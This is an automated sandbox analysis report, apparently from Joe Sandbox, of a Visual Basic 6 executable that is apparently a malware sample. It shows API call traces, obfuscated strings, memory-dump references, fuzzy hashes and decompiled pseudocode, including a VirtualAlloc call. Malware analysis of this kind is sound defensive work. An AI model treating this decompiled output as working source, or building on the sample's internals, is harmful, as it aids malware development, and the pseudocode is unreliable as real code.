__vbaObjSet.MSVBVM60(?,00000000), ref: 004137B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000078), ref: 004137FE
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00413825
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413861
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000180), ref: 004138AE
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004138D5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413911
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000001E0), ref: 0041395E
__vbaStrMove.MSVBVM60(00000000,?,00403CFC,000001E0), ref: 00413991
__vbaFreeStr.MSVBVM60(?,?,?,?,BE56F550,?,?,003DD855,?), ref: 00413A29
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,BE56F550,?,?,003DD855,?), ref: 00413A4C
#589.MSVBVM60(00000001), ref: 00413A56
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000254), ref: 00413A99
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000114), ref: 00413AE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000110), ref: 00413B2E
#569.MSVBVM60(0000006D), ref: 00413B51
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00413B6F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413BAB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403CFC,000001D4), ref: 00413BF1
__vbaFreeObj.MSVBVM60(00000000,00000000,00403CFC,000001D4), ref: 00413C0B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,000002B4), ref: 00413C42
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00413C9E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413CDA

Strings

Menuvalgs1, xrefs: 0041463A
AhqPMmu0oktAmE5cfXuhqt4svE63, xrefs: 00414179
TELEKABLERNE, xrefs: 00413DA8
`sA, xrefs: 00411DD7
70, xrefs: 004139B6
aCr7BNH7p7FLa196, xrefs: 00413091
`sA, xrefs: 004134E8
`sA, xrefs: 00413EA4
AFFIXING, xrefs: 00412FFB
Trvegraven, xrefs: 0041303F
8/8/8, xrefs: 00412E69
`sA, xrefs: 00414D47
9-9-9, xrefs: 004129B1, 00414B34
Skattekistens2, xrefs: 00412A3A
01/01/01, xrefs: 00413DE9
VINKLDEREN, xrefs: 00412B09
d, xrefs: 00413C60
Coracoidal4, xrefs: 00414D55
var, xrefs: 0041475A
D?@, xrefs: 004141E7, 004144F2, 00414096, 00414189, 0041409C, 004141ED, 004144F8
Options, xrefs: 004150AF
ABC, xrefs: 00413F96
Show Tips at Startup, xrefs: 004150AA
ludderens, xrefs: 00412FF6
Lserundersgelse9, xrefs: 00413F1A
`sA, xrefs: 00412AFB
toddlekins, xrefs: 00413485
`sA, xrefs: 00412EF4
Magniumets, xrefs: 00412FF1
karakterens, xrefs: 00413F15
rr, xrefs: 00413FF0
`sA, xrefs: 00414619
`sA, xrefs: 00412C3C
Jellifying, xrefs: 00413D7F
bnkhages, xrefs: 00413D54
`sA, xrefs: 00414F60

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$CheckHresult$Free$New2$List$ChkstkMove$CallConstruct2Late$#535#542#557#559#569#571#574#589#592#600#679#680#683#689#717AddrefCastError
String ID: rr$01/01/01$70$8/8/8$9-9-9$ABC$AFFIXING$AhqPMmu0oktAmE5cfXuhqt4svE63$Coracoidal4$D?@$Jellifying$Lserundersgelse9$Magniumets$Menuvalgs1$Options$Show Tips at Startup$Skattekistens2$TELEKABLERNE$Trvegraven$VINKLDEREN$`sA$`sA$`sA$`sA$`sA$`sA$`sA$`sA$`sA$aCr7BNH7p7FLa196$bnkhages$d$karakterens$ludderens$toddlekins$var
API String ID: 3020850277-2525867670
Opcode ID: 3409a79cef4f75ff2f2e52974c8a121da87623219d7b9d6bcffaf57f332d7277
Instruction ID: 67f15c1fd3464c78593f815e640c4f24cc49c1ad35dd3455aef1056933ff5be4
Opcode Fuzzy Hash: 3409a79cef4f75ff2f2e52974c8a121da87623219d7b9d6bcffaf57f332d7277
Instruction Fuzzy Hash: FF631671A00228AFDB21DF50CC45FD9B7B8BB09305F1045EAE14ABB2A1DB795AC4DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00415207, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00415207(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a28, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				char _v180;
				void* _v184;
				signed int _v188;
				short _v192;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				intOrPtr _t90;
				char* _t91;
				char* _t93;
				char* _t94;
				signed int _t98;
				short _t102;
				char* _t106;
				signed int _t110;
				intOrPtr _t111;
				void* _t144;
				void* _t146;
				intOrPtr _t147;

				_t147 = _t146 - 0xc;
				 *[fs:0x0] = _t147;
				L00401310();
				_v16 = _t147;
				_v12 = 0x401280;
				_v8 = 0;
				_t90 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t144);
				L00401556();
				L00401556();
				L004013E8();
				_v56 = _t90;
				_v64 = 8;
				_t91 =  &_v64;
				_push(_t91); // executed
				L00401466(); // executed
				_v184 =  ~(0 | _t91 != 0x0000ffff);
				L0040152C();
				if(_v184 != 0) {
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					_v120 = L"nauseated";
					_v128 = 8;
					L0040151A();
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push(0);
					_push( &_v64);
					L00401520();
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(4);
					L00401514();
				}
				_v56 = 0x17;
				_v64 = 2;
				_t93 =  &_v64;
				L004013E2();
				L00401544();
				L0040152C();
				L004013DC();
				_t94 =  &_v48;
				L004014A8();
				_v184 = _t94;
				_t98 =  *((intOrPtr*)( *_v184 + 0x1c))(_v184,  &_v180, _t94, _t93, _t93, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe);
				asm("fclex");
				_v188 = _t98;
				if(_v188 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40407c);
					_push(_v184);
					_push(_v188);
					L00401574();
					_v204 = _t98;
				}
				_v192 =  ~(0 | _v180 != 0x00000000);
				L00401562();
				_t102 = _v192;
				if(_t102 != 0) {
					_push(0x97);
					L004013D6();
					_v28 = _t102;
				}
				if( *0x417010 != 0) {
					_v208 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v208 = 0x417010;
				}
				_t106 =  &_v48;
				L004014A8();
				_v184 = _t106;
				_t110 =  *((intOrPtr*)( *_v184 + 0x1a0))(_v184,  &_v180, _t106,  *((intOrPtr*)( *((intOrPtr*)( *_v208)) + 0x2fc))( *_v208));
				asm("fclex");
				_v188 = _t110;
				if(_v188 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x403cfc);
					_push(_v184);
					_push(_v188);
					L00401574();
					_v212 = _t110;
				}
				_t111 = _v180;
				_v32 = _t111;
				L00401562();
				_push(0x4154dc);
				L00401532();
				L00401532();
				L00401532();
				return _t111;
			}

0x0041520a
0x00415219
0x00415225
0x0041522d
0x00415230
0x00415237
0x00415246
0x0041524f
0x0041525a
0x0041525f
0x00415264
0x00415267
0x0041526e
0x00415271
0x00415272
0x00415282
0x0041528c
0x0041529a
0x0041529c
0x004152a3
0x004152aa
0x004152b1
0x004152b8
0x004152bf
0x004152c6
0x004152cd
0x004152da
0x004152e2
0x004152e6
0x004152ea
0x004152eb
0x004152f0
0x004152f1
0x004152f9
0x004152fd
0x00415301
0x00415305
0x00415306
0x00415308
0x0041530d
0x00415310
0x00415317
0x00415326
0x0041532a
0x00415334
0x0041533c
0x00415341
0x00415347
0x0041534b
0x00415350
0x0041536b
0x0041536e
0x00415370
0x0041537d
0x0041539f
0x0041537f
0x0041537f
0x00415381
0x00415386
0x0041538c
0x00415392
0x00415397
0x00415397
0x004153b4
0x004153be
0x004153c3
0x004153cc
0x004153ce
0x004153d3
0x004153d8
0x004153d8
0x004153e2
0x004153ff
0x004153e4
0x004153e4
0x004153e9
0x004153ee
0x004153f3
0x004153f3
0x00415423
0x00415427
0x0041542c
0x00415447
0x0041544d
0x0041544f
0x0041545c
0x00415481
0x0041545e
0x0041545e
0x00415463
0x00415468
0x0041546e
0x00415474
0x00415479
0x00415479
0x00415488
0x0041548e
0x00415494
0x00415499
0x004154c6
0x004154ce
0x004154d6
0x004154db

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00415225
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 0041524F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 0041525A
#609.MSVBVM60(?,?,?,?,00401316), ref: 0041525F
#557.MSVBVM60(00000008), ref: 00415272
__vbaFreeVar.MSVBVM60(00000008), ref: 0041528C
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 004152DA
#595.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 004152F1
__vbaFreeVarList.MSVBVM60(00000004,00000008,0000000A,0000000A,0000000A,00000008,00000000,0000000A,0000000A,0000000A), ref: 00415308
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000008), ref: 0041532A
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000008), ref: 00415334
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000008), ref: 0041533C
#685.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000008), ref: 00415341
__vbaObjSet.MSVBVM60(?,00000000,00000002,000000FF,000000FE,000000FE,000000FE,00000008), ref: 0041534B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040407C,0000001C), ref: 00415392
__vbaFreeObj.MSVBVM60(00000000,?,0040407C,0000001C), ref: 004153BE
#570.MSVBVM60(00000097), ref: 004153D3
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004153EE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415427
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000001A0), ref: 00415474
__vbaFreeObj.MSVBVM60(00000000,?,00403CFC,000001A0), ref: 00415494
__vbaFreeStr.MSVBVM60(004154DC), ref: 004154C6
__vbaFreeStr.MSVBVM60(004154DC), ref: 004154CE
__vbaFreeStr.MSVBVM60(004154DC), ref: 004154D6

Strings

nauseated, xrefs: 004152C6

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$CheckCopyHresult$#557#570#595#609#685#702ChkstkListMoveNew2
String ID: nauseated
API String ID: 2429444921-2397764650
Opcode ID: c09d0ed04569d584749c9351418635a09524ece3394659423333942df0f5a9ef
Instruction ID: 79b1e812c0eee1ef90cddedd0dbd98f36c05c726ef9bd48345ddc297ccfe2bf1
Opcode Fuzzy Hash: c09d0ed04569d584749c9351418635a09524ece3394659423333942df0f5a9ef
Instruction Fuzzy Hash: F1711971D00218EFDB10EFA1CC45BDDB7B9AF48304F1081AAE51ABB1A1DB789A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1EB, Relevance: 1.4, APIs: 1, Instructions: 165
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000,00001000,?,004150FF,?,00000000), ref: 0040F646

Memory Dump Source

Source File: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd6447f73a8373626524e77fccf836d862fdf9fafc9a358804fdd19478748a3c
Instruction ID: 2f93c96c6cb0b0414400bc96d24947021b3038cfb5be86de39c2e62f06a04233
Opcode Fuzzy Hash: cd6447f73a8373626524e77fccf836d862fdf9fafc9a358804fdd19478748a3c
Instruction Fuzzy Hash: 7A417962E2A310DAD3A36970C8405A16681DF263857328BB79C2676DF4F73E0A4F65C9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411856, Relevance: 69.3, APIs: 46, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00411856(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				short _v36;
				char _v40;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				short _v104;
				char _v112;
				char _v128;
				char _v144;
				char* _v152;
				char _v160;
				intOrPtr _v200;
				char _v208;
				short _v212;
				short _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				intOrPtr _v240;
				char* _t153;
				void* _t154;
				char* _t158;
				char* _t161;
				signed short _t171;
				char* _t181;
				intOrPtr _t183;
				intOrPtr _t185;
				signed int _t187;
				char* _t189;
				short _t199;
				char* _t204;
				intOrPtr _t211;
				char* _t217;
				signed int _t225;
				char* _t232;
				void* _t237;
				void* _t239;
				intOrPtr _t240;
				void* _t241;
				void* _t242;
				void* _t246;

				_t236 = __esi;
				_t235 = __edi;
				_t219 = __ebx;
				_t240 = _t239 - 0xc;
				 *[fs:0x0] = _t240;
				L00401310();
				_v16 = _t240;
				_v12 = 0x4011e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t237);
				_push( &_v28);
				_push(0x2003f);
				_push(0);
				_push( *_a12);
				_t153 =  &_v60;
				_push(_t153);
				L00401508();
				_push(_t153);
				_t154 = _a8;
				_push( *_t154);
				E00403B28();
				_v212 = _t154;
				L00401502();
				_push(_v60);
				_push(_a12);
				L004014FC();
				_v36 = _v212;
				L00401532();
				if(_v36 == 0) {
					_v72 = _v72 & 0x00000000;
					_v80 = 2;
					_push( &_v80);
					_push(0x400);
					L004014F6();
					L00401544();
					L0040152C();
					_v56 = 0x400;
					_push( &_v56);
					_push(_v52);
					_t158 =  &_v64;
					_push(_t158);
					L00401508();
					_push(_t158);
					_push( &_v40);
					_push(0);
					_push( *_a16);
					_t161 =  &_v60;
					_push(_t161);
					L00401508();
					_push(_t161);
					_push(_v28);
					E00403B74();
					_v212 = _t161;
					L00401502();
					_push(_v60);
					_push(_a16);
					L004014FC();
					_push(_v64);
					_push( &_v52);
					L004014FC();
					_v36 = _v212;
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L00401550();
					_t241 = _t240 + 0xc;
					__eflags = _v36;
					if(__eflags == 0) {
						_v72 = 1;
						_v80 = 2;
						_v152 =  &_v52;
						_v160 = 0x4008;
						_push( &_v80);
						_push(_v56);
						_push( &_v160);
						_push( &_v96);
						L004014E4();
						_push( &_v96);
						_t171 =  &_v60;
						_push(_t171);
						L004014EA();
						_push(_t171);
						L004014F0();
						asm("sbb eax, eax");
						_v216 =  ~( ~_t171 + 1);
						L00401532();
						_push( &_v96);
						_push( &_v80);
						_push(2);
						L00401514();
						_t242 = _t241 + 0xc;
						__eflags = _v216;
						if(_v216 == 0) {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_push(_v56);
							_push( &_v160);
							_push( &_v80);
							L004014D8();
							_t181 =  &_v80;
							_push(_t181);
							L004014DE();
							_t232 = _t181;
							L00401544();
							_t225 =  &_v80;
							L0040152C();
						} else {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_push(_v56 - 1);
							_push( &_v160);
							_push( &_v80);
							L004014D8();
							_t217 =  &_v80;
							_push(_t217);
							L004014DE();
							_t232 = _t217;
							L00401544();
							_t225 =  &_v80;
							L0040152C();
						}
						_v220 = _v40;
						_t183 = _v220;
						_v240 = _t183;
						__eflags = _v240 - 1;
						if(__eflags == 0) {
							_t232 = _v52;
							_t225 = _a20;
							L00401556();
						} else {
							__eflags = _v240 - 4;
							if(__eflags == 0) {
								_v228 = 1;
								_v224 = _v224 | 0xffffffff;
								_push(_v52);
								L004014D2();
								_v32 = _t183;
								while(1) {
									__eflags = _v32 - _v228;
									if(__eflags < 0) {
										break;
									}
									_v200 =  *_a20;
									_v208 = 8;
									_v72 = 1;
									_v80 = 2;
									_v152 =  &_v52;
									_v160 = 0x4008;
									_push( &_v80);
									_push(_v32);
									_push( &_v160);
									_push( &_v96);
									L004014E4();
									_push( &_v96);
									_t199 =  &_v60;
									_push(_t199);
									L004014EA();
									_push(_t199);
									L004014F0();
									_v104 = _t199;
									_v112 = 2;
									_push( &_v112);
									_push( &_v128);
									L004014C6();
									_push( &_v208);
									_push( &_v128);
									_t204 =  &_v144;
									_push(_t204);
									L004014CC();
									_push(_t204);
									L004014DE();
									L00401544();
									L00401532();
									_push( &_v144);
									_push( &_v128);
									_push( &_v112);
									_push( &_v96);
									_push( &_v80);
									_push(5);
									L00401514();
									_t242 = _t242 + 0x18;
									_t211 = _v32 + _v224;
									__eflags = _t211;
									_v32 = _t211;
								}
								_v88 = 0x80020004;
								_v96 = 0xa;
								_push(0x403cd4);
								_t187 = _a20;
								_push( *_t187);
								L00401538();
								_v72 = _t187;
								_v80 = 8;
								_push(1);
								_push(1);
								_push( &_v96);
								_t189 =  &_v80;
								_push(_t189);
								L004014C0();
								_t232 = _t189;
								_t225 = _a20;
								L00401544();
								_push( &_v96);
								_push( &_v80);
								_push(2);
								L00401514();
							} else {
							}
						}
						_v48 = _v48 | 0x0000ffff;
						_push(_v28);
						_v212 = E00403BB8(_t219, _t225, _t232, _t235, _t236, __eflags, _t246);
						L00401502();
						_t185 = _v212;
						_v36 = _t185;
					} else {
						goto L17;
					}
				} else {
					L17:
					L00401556();
					_v48 = _v48 & 0x00000000;
					_push(_v28);
					_v212 = E00403BB8(_t219, _a20, 0x403c68, _t235, _t236, _v48, _t246);
					L00401502();
					_t185 = _v212;
					_v36 = _t185;
				}
				_push(0x411cc6);
				L00401532();
				return _t185;
			}

0x00411856
0x00411856
0x00411856
0x00411859
0x00411868
0x00411874
0x0041187c
0x0041187f
0x00411886
0x00411895
0x0041189b
0x0041189c
0x004118a1
0x004118a6
0x004118a8
0x004118ab
0x004118ac
0x004118b1
0x004118b2
0x004118b5
0x004118b7
0x004118bc
0x004118c2
0x004118c7
0x004118ca
0x004118cd
0x004118d8
0x004118de
0x004118e7
0x004118ee
0x004118f2
0x004118fc
0x004118fd
0x00411902
0x0041190c
0x00411914
0x00411919
0x00411923
0x00411924
0x00411927
0x0041192a
0x0041192b
0x00411930
0x00411934
0x00411935
0x0041193a
0x0041193c
0x0041193f
0x00411940
0x00411945
0x00411946
0x00411949
0x0041194e
0x00411954
0x00411959
0x0041195c
0x0041195f
0x00411964
0x0041196a
0x0041196b
0x00411976
0x0041197c
0x00411980
0x00411981
0x00411983
0x00411988
0x0041198b
0x0041198f
0x00411996
0x0041199d
0x004119a7
0x004119ad
0x004119ba
0x004119bb
0x004119c4
0x004119c8
0x004119c9
0x004119d1
0x004119d2
0x004119d5
0x004119d6
0x004119db
0x004119dc
0x004119e4
0x004119e9
0x004119f3
0x004119fb
0x004119ff
0x00411a00
0x00411a02
0x00411a07
0x00411a11
0x00411a13
0x00411a5d
0x00411a63
0x00411a6d
0x00411a76
0x00411a7a
0x00411a7b
0x00411a80
0x00411a83
0x00411a84
0x00411a89
0x00411a8e
0x00411a93
0x00411a96
0x00411a15
0x00411a18
0x00411a1e
0x00411a2c
0x00411a33
0x00411a37
0x00411a38
0x00411a3d
0x00411a40
0x00411a41
0x00411a46
0x00411a4b
0x00411a50
0x00411a53
0x00411a53
0x00411a9e
0x00411aa4
0x00411aaa
0x00411ab0
0x00411ab7
0x00411ac7
0x00411aca
0x00411acd
0x00411ab9
0x00411ab9
0x00411ac0
0x00411ad7
0x00411ae1
0x00411ae8
0x00411aeb
0x00411af0
0x00411b01
0x00411b04
0x00411b0a
0x00000000
0x00000000
0x00411b15
0x00411b1b
0x00411b25
0x00411b2c
0x00411b36
0x00411b3c
0x00411b49
0x00411b4a
0x00411b53
0x00411b57
0x00411b58
0x00411b60
0x00411b61
0x00411b64
0x00411b65
0x00411b6a
0x00411b6b
0x00411b70
0x00411b74
0x00411b7e
0x00411b82
0x00411b83
0x00411b8e
0x00411b92
0x00411b93
0x00411b99
0x00411b9a
0x00411b9f
0x00411ba0
0x00411baa
0x00411bb2
0x00411bbd
0x00411bc1
0x00411bc5
0x00411bc9
0x00411bcd
0x00411bce
0x00411bd0
0x00411bd5
0x00411af8
0x00411af8
0x00411afe
0x00411afe
0x00411bdd
0x00411be4
0x00411beb
0x00411bf0
0x00411bf3
0x00411bf5
0x00411bfa
0x00411bfd
0x00411c04
0x00411c06
0x00411c0b
0x00411c0c
0x00411c0f
0x00411c10
0x00411c15
0x00411c17
0x00411c1a
0x00411c22
0x00411c26
0x00411c27
0x00411c29
0x00000000
0x00411ac2
0x00411ac0
0x00411c31
0x00411c36
0x00411c3e
0x00411c44
0x00411c49
0x00411c4f
0x00411991
0x00000000
0x00411991
0x004118e9
0x00411c54
0x00411c5c
0x00411c61
0x00411c66
0x00411c6e
0x00411c74
0x00411c79
0x00411c7f
0x00411c7f
0x00411c82
0x00411cc0
0x00411cc5

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00411874
__vbaStrToAnsi.MSVBVM60(?,00401316,00000000,0002003F,?,?,?,?,?,00401316), ref: 004118AC
__vbaSetSystemError.MSVBVM60(?,00000000,?,00401316,00000000,0002003F,?,?,?,?,?,00401316), ref: 004118C2
__vbaStrToUnicode.MSVBVM60(00401316,00000000,?,00000000,?,00401316,00000000,0002003F,?,?,?,?,?,00401316), ref: 004118CD
__vbaFreeStr.MSVBVM60(00401316,00000000,?,00000000,?,00401316,00000000,0002003F,?,?,?,?,?,00401316), ref: 004118DE
#606.MSVBVM60(00000400,00000002), ref: 00411902
__vbaStrMove.MSVBVM60(00000400,00000002), ref: 0041190C
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 00411914
__vbaStrToAnsi.MSVBVM60(?,00401316,00000400,00000400,00000002), ref: 0041192B
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,00401316,00000400,00000400,00000002), ref: 00411940
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,00401316,00000400,00000400,00000002), ref: 00411954
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401316,00000400,00000400,00000002), ref: 0041195F
__vbaStrToUnicode.MSVBVM60(00401316,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401316,00000400,00000400,00000002), ref: 0041196B
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00401316,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401316), ref: 00411983
__vbaStrCopy.MSVBVM60(00401316,00000000,?,00000000,?,00401316,00000000,0002003F,?), ref: 00411C5C
__vbaSetSystemError.MSVBVM60(?), ref: 00411C74
__vbaFreeStr.MSVBVM60(00411CC6,?), ref: 00411CC0

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
String ID:
API String ID: 3225542645-0
Opcode ID: 00c72f538652969f9aed2a8df1d7db06ce68e9f528013acbc0b92d9b4cfd5de5
Instruction ID: 6148ecf244a7907cb467f30b8785ac490b76ed246af965564c26271191fe0261
Opcode Fuzzy Hash: 00c72f538652969f9aed2a8df1d7db06ce68e9f528013acbc0b92d9b4cfd5de5
Instruction Fuzzy Hash: C9C1A671D0021DAADF11EFE5D845FDEBBB8AF04304F40816AF516B72A1DB38AA458F64

Uniqueness

Uniqueness Score: -1.00%

Function 004162C2, Relevance: 56.2, APIs: 28, Strings: 4, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004162C2(void* __ebx, void* __ecx, void* __edi, void* __esi, signed long long __fp0, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				short _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				char _v84;
				void* _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed long long _v136;
				signed long long _v140;
				signed int _v144;
				signed int _t99;
				char* _t104;
				signed int _t105;
				char* _t109;
				signed int _t113;
				signed int _t121;
				signed int _t127;
				intOrPtr _t146;
				intOrPtr* _t161;
				signed long long _t173;

				_t173 = __fp0;
				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t99 = 0x7c;
				L00401310();
				_v12 = _t161;
				_v8 = 0x4012e8;
				L00401556();
				_push(0x4040f4);
				L004014D2();
				if(_t99 != 1) {
					_push(0);
					_push(L"YPPERSTEPRSTINDERNE");
					_push( &_v64);
					L004013AC();
					_t99 = 0x10;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L004013B2();
					L0040152C();
				}
				_push(0x403f50);
				L004013A6();
				L00401544();
				_push(_t99);
				_push(0x403f5c);
				L0040154A();
				asm("sbb eax, eax");
				_v88 =  ~( ~( ~_t99));
				L00401532();
				if(_v88 != 0) {
					if( *0x417360 != 0) {
						_v112 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v112 = 0x417360;
					}
					_t15 =  &_v112; // 0x417360
					_v88 =  *((intOrPtr*)( *_t15));
					_t121 =  *((intOrPtr*)( *_v88 + 0x4c))(_v88,  &_v44);
					asm("fclex");
					_v92 = _t121;
					if(_v92 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x403c24);
						_push(_v88);
						_push(_v92);
						L00401574();
						_v116 = _t121;
					}
					_v96 = _v44;
					_v72 = 0x9e;
					_v80 = 2;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t127 =  *((intOrPtr*)( *_v96 + 0x1c))(_v96, 0x10,  &_v48);
					asm("fclex");
					_v100 = _t127;
					if(_v100 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403f10);
						_push(_v96);
						_push(_v100);
						L00401574();
						_v120 = _t127;
					}
					_v108 = _v48;
					_v48 = _v48 & 0x00000000;
					_push(_v108);
					_push( &_v36);
					L004014A8();
					L00401562();
				}
				_v72 = L"2/2/2";
				_v80 = 8;
				L0040151A();
				_t104 =  &_v64;
				_push(_t104);
				L00401466();
				_v88 =  ~(0 | _t104 != 0x0000ffff);
				L0040152C();
				_t105 = _v88;
				if(_t105 != 0) {
					if( *0x417010 != 0) {
						_v124 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v124 = 0x417010;
					}
